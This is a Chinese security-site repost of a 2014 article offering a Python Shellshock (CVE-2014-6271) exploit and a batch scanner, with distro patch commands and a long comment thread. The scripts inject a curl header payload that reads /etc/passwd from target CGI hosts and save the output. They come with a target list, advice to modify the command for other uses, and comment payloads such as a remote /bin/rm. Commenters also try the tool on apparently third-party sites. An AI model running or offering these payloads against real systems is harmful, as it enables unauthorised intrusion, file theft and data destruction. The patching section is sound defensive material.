CVE漏洞中文网

0DayBank一个专门收集整理全球互联网漏洞的公开发布网站
  1. 首页
  2. 百科
  3. 正文

bash 漏洞

2017年5月22日 895点热度 0人点赞 0条评论
  • 首页
  • 分类阅读
  • 文库
  • 专栏
  • 公开课
  • 商城
  • 漏洞盒子
注册 | 登录
投稿

Bash漏洞批量检测工具与修复方案

ziwen2014-09-28+8共428388人围观 ,发现 61 个不明物体工具漏洞

Linux官方内置Bash中新发现一个非常严重安全漏洞,黑客可以利用该Bash漏洞完全控制目标系统并发起攻击。

Bash远程命令执行漏洞(CVE2014-6271)检测脚本

作者:ziwen(dn8.net团队)

运行环境:python 2.7

#!/usr/bin/env python
#coding:utf-8
import os
import sys
import re
print "f4ck ziwen cve 2014 6271 exp attacking!"
if sys.argv[1].startswith('-'):
    option = sys.argv[1][1:]
    if option == 'url':
        b=sys.argv[2]
        if not re.match("http",sys.argv[2]):
            print "URL格式错误 正确格式例如http://www.baidu.com/1.cgi"
        
        else:
            out=re.sub("\.|\/","",b)
            out=out[7:]
            print "shahdashhdd",out,b
            a="curl -H \'x: () { :;};a=`/bin/cat /etc/passwd`;echo \"a: $a\"' '"+b+"' -I -o "+out+"\"output\".txt"
            os.system(a)
            f = open(out+"output.txt", 'r')
            a=f.read()
            if re.search("root|bin\/bash",a):
                print "target possible have bug under is *nix passwd file"
                print a
            else:
                f.close()
                os.remove(out+"output.txt")
                print "possible dont have bug! or have a waf!"
    else:
        print "error! U can email to me U question (ziwen@21.wf)"
        print option

下载地址

脚本会将结果回显出来 如果存在漏洞的话还会把passwd文件保存在以目标域名+output命名的txt文档里,不成功不保存

执行方法

python c:\exp.py -url
 http://23.239.208.105/cgi-bin/poc.cgi

批量检测是否存在Bash远程命令执行漏洞

#!/usr/bin/env python
#coding:utf-8
import os
import sys
PATH=sys.path[0]+"/"
text=open(PATH+"target.txt",'r')
for line in text:
    print line
    os.system("python "+PATH+"exp.py -url "+line)

下载地址

该脚本调用了上面那个EXP 所以请运行该脚本时请将两个脚本放同一目录 并在该目录下新建target.txt文件将您的目标列表放进文件里
如:
http://www.baidu.com
http://23.239.208.105/cgi-bin/poc.cgi
然后运行该脚本即可 该脚本便会自动按顺序检测 会把结果回显出来 并会把成功的目标的passwd文件保存在 以目标域名+output命名的txt文档里,不成功不保存

请不要随意改变exp.py的文件名 如果改变了EXP.PY的文件名请将batch.py里面的exp.py改为您修改的文件名 否则batch.py会运行失败

其他

linux如果用不了上面那个版本请试下这个Linux专版
http://pan.baidu.com/s/1hq7oCYw
windows用不了请试试下面这个windows专版
http://pan.baidu.com/s/1kTmjNKV

如果需要生成其他文件或者利用漏洞做其他事请自行修改脚本中的curl命令
个别报错报CURL命令错误的是CURL版本问题,不是我脚本问题,我这边多个基友都测试了无误

漏洞修复方案

请您根据Linux版本选择您需要修复的命令, 为了防止意外情况发生,建议您执行命令前先对Linux服务器系统盘打个快照,如果万一出现升级影响您服务器使用情况,可以通过回滚系统盘快照解决。

centos:(最终解决方案) 

yum clean all 
yum makecache 
yum -y update bash

ubuntu:(最终解决方案) 

apt-get update 
apt-get -y install --only-upgrade bash

debian:(最终解决方案) 

7.5  64bit && 32bit  

apt-get update 
apt-get -y install --only-upgrade bash

6.0.x 64bit

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_amd64.deb &&  dpkg -i bash_4.1-3+deb6u2_amd64.deb

6.0.x 32bit

wget http://mirrors.aliyun.com/debian/pool/main/b/bash/bash_4.1-3+deb6u2_i386.deb &&  dpkg -i bash_4.1-3+deb6u2_i386.deb

aliyun linux:(最终解决方案) 
5.x 64bit

wget http://mirrors.aliyun.com/centos/5/updates/x86_64/RPMS/bash-3.2-33.el5_10.4.x86_64.rpm && rpm -Uvh bash-3.2-33.el5_10.4.x86_64.rpm

5.x 32bit

wget http://mirrors.aliyun.com/centos/5/updates/i386/RPMS/bash-3.2-33.el5_10.4.i386.rpm  && rpm -Uvh bash-3.2-33.el5_10.4.i386.rpm

opensuse:(最终解决方案) 

zypper clean 
zypper refresh 
zypper update -y bash

[参考信息来源:http://bbs.aliyun.com/read/176977.html?spm=5176.7189909.3.15.sZTgst,转载请注明来自FreeBuf.COM]

ziwen

ziwen5 篇文章等级: 4级
|
|
  • 上一篇:Bash漏洞引发僵尸网络狂欢
  • 下一篇:Bash漏洞再次演进:缓冲区溢出导致远程任意命令执行

这些评论亮了

  • Halo回复
    @ziwen  呵呵,本来不想喷的,你一说我倒想说几句了,调用个系统命令也叫python?呵呵呵呵,直接cat password文件然后查找是否有root特征也叫漏洞?呵呵呵,让我来普及你幼小的心灵,并不是每个cgi都会输出,就算想做,也得做的漂亮点再拿出来吧,人得虚心懂吗?对了,路过的fb友告诉我,约架哪家强?!
    )77(亮了
发表评论

已有 61 条评论

  • softbug (7级)011101000110100001100001011011... 2014-09-28回复1楼

    centos 6.x 5.x 的bash修复后的rpm包,谁可以给一个地址。

    亮了(2)
    • c4bbage 2014-09-28回复

      @softbug

      亮了(1)
    • c4bbage 2014-09-28回复

      @softbug  wget http://mirrors.aliyun.com/centos/5/updates/i386/RPMS/bash-3.2-33.el5_10.4.i386.rpm&&rpm -Uvh bash-3.2-33.el5_10.4.i386.rpm

      wget http://mirrors.aliyun.com/centos/6/updates/x86_64/Packages/bash-4.1.2-15.el6_5.2.x86_64.rpm&& rpm -Uvh bash-4.1.2-15.el6_5.2.x86_64.rpm

      亮了(1)
  • MeirLin (5级)研表究明,汉字的序顺并不定一能影阅响读,比如当你看完这句话后... 2014-09-28回复2楼

    OSX呢?

    亮了(1)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

      @MeirLin  OSX直接用文中的脚本就可以 绝对无误 因为我本机就是OSX

      亮了(1)
  • Halo 2014-09-28回复3楼

    我代码写得少你可别骗我

    亮了(2)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

      @Halo 懂Python的不需要解释 不懂的解释也解释不通

      亮了(1)
      • 好羡慕大神啊 2017-02-12回复

        @ ziwen  这种说法好酷啊 张同学
        那你能告诉我 为什么不用shell script来解决这个问题而要用python呢?可以谈一下你的远见么?难道是我们的张小朋友过于强大不屑于用shell这种弱爆了的东西?

        亮了(0)
  • zglxw (3级) 2014-09-28回复4楼

    :mrgreen:

    亮了(1)
  • 10086 2014-09-28回复5楼

    明明一个文件就可以解决的事情,非要弄两个粗出! :lol:

    亮了(2)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

      @10086 这是批量和检测两个功能 弄两个方便用 请不要乱喷

      亮了(1)
      • Halo 2014-09-29回复

        @ziwen  呵呵,本来不想喷的,你一说我倒想说几句了,调用个系统命令也叫python?呵呵呵呵,直接cat password文件然后查找是否有root特征也叫漏洞?呵呵呵,让我来普及你幼小的心灵,并不是每个cgi都会输出,就算想做,也得做的漂亮点再拿出来吧,人得虚心懂吗?对了,路过的fb友告诉我,约架哪家强?!

        亮了(77)
      • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-29回复

        @Halo 您真厉害您真吊 欢迎您来发文章 而不是只在这喷

        亮了(1)
      • f4ck 2014-10-06回复

        @Halo 挖掘机技术到底哪家强?

        亮了(0)
    • linso (2级)欢迎关注我的微博、知乎、Twitter、csdn 2014-09-29回复

      你是河蟹派来的么?

      亮了(0)
  • Fiend520 (7级) 2014-09-28回复6楼

    C:\Users\HAWK>python C:\Users\HAWK\Desktop\bashceshi\exp.py http://contest.japia
    s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi
    f4ck ziwen cve 2014 6271 exp attacking!

    这算成功了吗?

    亮了(0)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

      @Fiend520  成功会回显passwd文件

      亮了(0)
      • Fiend520 (7级) 2014-09-28回复

        @ziwen  不好意思,我刚刚接触python,还不是太懂,我这样应用对吗?

        亮了(1)
      • ziwen 2014-09-28回复

        @Fiend520  是否报错了?

        亮了(0)
      • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

        @Fiend520  有没有报错?

        亮了(1)
      • Fiend520 (7级) 2014-09-28回复

        @ziwen  我运行的这个C:\Users\HAWK>python C:\Users\HAWK\Desktop\bashceshi\exp.py http://contest.japia s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi
        显示这个
        f4ck ziwen cve 2014 6271 exp attacking!

        亮了(0)
      • ziwen 2014-09-28回复

        @Fiend520  不显示别的?

        亮了(1)
      • Fiend520 (7级) 2014-09-29回复

        @ziwen 不显示其他的。难道我的命令有错误,那个-url是必须添加的吗?我尝试过添加-url 以后显示不是内部命令。其余的没有任何显示。

        亮了(1)
      • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-29回复

        @Fiend520  url当然要添加 要不然没有目标

        亮了(0)
      • Fiend520 (7级) 2014-09-29回复

        @ziwen  我添加url了,你看我的操作命令是 python C:\Users\HAWK\Desktop\bashceshi\exp.py http://contest.japia s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi我把你编写的exp放到了C:\Users\HAWK\Desktop\bashceshi\里,http://contest.japia s.jp/tqj2007/90087/cgi-bin/epad/epad.cgi这个是目标,我的意思是在这个目标之前要不要添加 -url这个命令

        亮了(0)
      • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-29回复

        @Fiend520  要的

        亮了(1)
      • Fiend520 (7级) 2014-09-29回复

        @ziwen  可是我一添加,一运行命令就显示 -url 不是内部命令,擦,是我太笨了还是没有配置好呢

        亮了(0)
      • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-30回复

        @Fiend520  不能把 应该还是您没有配置好 要不您加我QQ吧 ziwen@21.wf

        亮了(0)
  • xxx (2级) 2014-09-28回复7楼

    yum update bash是要重启?好像rpm安装不用.

    亮了(1)
  • 看看1 2014-09-28回复8楼

    有没有使用成功的? 完全用不了啊 我了个去 回显要不就是 f4ck ziwen cve 2014 6271 exp attacking! 一句广告 要不就是 SyntaxError: invalid syntax 语法错误 完全没有在目录里生成任何东西,有成功的烦请告知一声。

    亮了(1)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

      @看看1 那不是广告好吗 而且我也注明了为什么会报错和报错的解决办法 你不会Python不要乱喷好吗

      亮了(0)
    • goodgoodstudy 2014-09-28回复

      @看看1 cetos上Python2.6+curl7.19版本OK

      亮了(1)
  • 黑黑的白猫 (2级) 2014-09-28回复9楼

    技术提高了不少

    亮了(1)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

      @黑黑的白猫  谢谢

      亮了(1)
  • ln1901 (1级) 2014-09-28回复10楼

    楼主你能确定那些修复方案是最终的吗?

    亮了(1)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-28回复

      @ln1901  只是修复CVE20146271的

      亮了(1)
  • ln1901 (1级) 2014-09-28回复11楼

    现在又出现了CVE-2014-7186,CVE-2014-7187,详见https://lists.gnu.org/archive/html/bug-bash/2014-09/msg00238.html,貌似bash 4.3.26修复不了CVE-2014-7186

    亮了(0)
  • 钻地球的 2014-09-28回复12楼

    Shellshock。公布漏洞只会让更多“黑客”获得新的手段,而真正会去补漏的少!

    亮了(0)
  • 集齐好人卡的rootoorotor 2014-09-28回复13楼

    赞!

    亮了(0)
  • Netf 2014-09-28回复14楼

    没搞,最近不在研究这个。

    亮了(0)
  • 阿伦aka挨踢民工 2014-09-28回复15楼

    研究啥?工控系统漏洞?

    亮了(0)
  • 王思聪 2014-09-29回复16楼

    可以加个参数 –url 单个,,,–file 批量,,,,,

    亮了(1)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-29回复

      @王思聪 恩恩 是个好主意

      亮了(0)
  • cainiao 2014-09-29回复17楼

    多谢分享。

    亮了(0)
  • 无丶花 (2级)FB客服MM的男朋友。 2014-09-29回复18楼

    玩得真不错!会玩的!

    亮了(0)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-29回复

      @无丶花  额?

      亮了(0)
  • linso (2级)欢迎关注我的微博、知乎、Twitter、csdn 2014-09-29回复19楼

    能不能录制一个安装和使用的视频啊?这写的有点乱

    亮了(0)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-29回复

      @linso  录视频可以但每种环境的使用过程都不一样 例如LINUX直接就可以运行 win却要安装CURL 很纠结

      亮了(0)
  • hang333 (4级) 2014-09-29回复20楼

    你不应该调用个系统命令呀 ==

    亮了(1)
    • ziwen (4级)ziwen 终端机 编程 web渗透爱好者 2014-09-29回复

      @hang333  头像不错 赞

      亮了(1)
      • hang333 (4级) 2014-10-05回复

        @ziwen  …

        亮了(1)
      • hang333 (4级) 2014-10-06回复

        @ziwen  我的头像是个男的

        亮了(1)
  • 0xExploit (3级) 2014-09-29回复21楼

    我有个问题,我把exp:curl -H ‘x: () { :;};a=`/bin/cat /etc/passwd`;echo $a’ http://172.16.229.146/cgi-bin/poc.cgi -I -o "/Users/0xExploit/Desktop/output.txt"执行,可以在output.txt中看到结果。但是执行curl -H ‘x: () { :;};a=`/bin/cat /etc/passwd`;echo $a’ http://172.16.229.146/cgi-bin/poc.cgi却不返回结果。。这个表示不懂。。
    另外看wooyun的这个exp:curl -A "() { :; }; /bin/rm /var/www/target" http://192.168.0.1/poc.cgi。也没侧成功。。
    感谢解答。

    亮了(0)
    • ziwen 2014-09-30回复

      @0xExploit  对不起是我考虑不周 所以要修改命令可能还要改正则 下次码代码时我会注意的 嘿嘿。。。

      亮了(0)
  • wangx 2014-09-29回复22楼

    一定要写英文提示才牛逼吗.

    亮了(1)
    • ziwen 2014-09-30回复

      @wangx 一定要用英文ID才牛比吗

      亮了(1)
  • 青衫 (1级) 2014-09-30回复23楼

    redhat没有嘛

    亮了(0)
  • qwerty (1级) 2014-09-30回复24楼

    路过 学习了
    http://cih.so/?p=754

    亮了(1)
    • ziwen 2014-10-03回复

      @qwerty  交个朋友吧大牛

      亮了(0)
  • 啊啊啊啊 2014-10-08回复25楼

    大神在这 我擦 牛xx的

    亮了(0)
  • 微雨独行 2014-12-11回复26楼

    路过,表示小白文

    亮了(0)

必须您当前尚未登录。登陆?注册

必须(保密)

表情插图

取消

ziwen

ziwen

ziwen 终端机 编程 web渗透爱好者

5 篇文章111 条评论

相关阅读

  • vFeed:结构化的漏洞与威胁数据库(支持CVE、CWE和OVAL)
  • Bash漏洞批量检测工具与修复方案
  • 2015年被发现安全漏洞最多的公司竟是苹果?
  • 利用patator进行子域名爆破
  • 教你用Python玩转神器Metasploit

特别推荐

关注我们 分享每日精选文章

不容错过

  • 密码重置漏洞那点事儿lanlan2013-12-25
  • 做一名无线黑客,这些装备你必须有mobier2015-06-01
  • Trustwave:中国制GSM语音网关存在Root权限后门cxt2017-03-05
  • 新手指南:DVWA-1.9全级别教程之SQL Injectionlonehand2016-11-27

FREEBUF

  • 免责声明
  • 关于我们
  • 加入我们

广告及服务

  • 寻求报道
  • 广告合作
  • 联系我们
  • 友情链接

关注我们

  • 官方微信
  • 新浪微博
  • 腾讯微博
  • Twitter

赞助商

Copyright © 2013 WWW.FREEBUF.COM All Rights Reserved 沪ICP备13033796号

css.php

正在加载中...

0daybank

标签: 暂无
最后更新:2017年5月22日

小助手

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

您需要 登录 之后才可以评论

COPYRIGHT © 2024 www.pdr.cn CVE漏洞中文网. ALL RIGHTS RESERVED.

鲁ICP备2022031030号

联系邮箱:wpbgssyubnmsxxxkkk@proton.me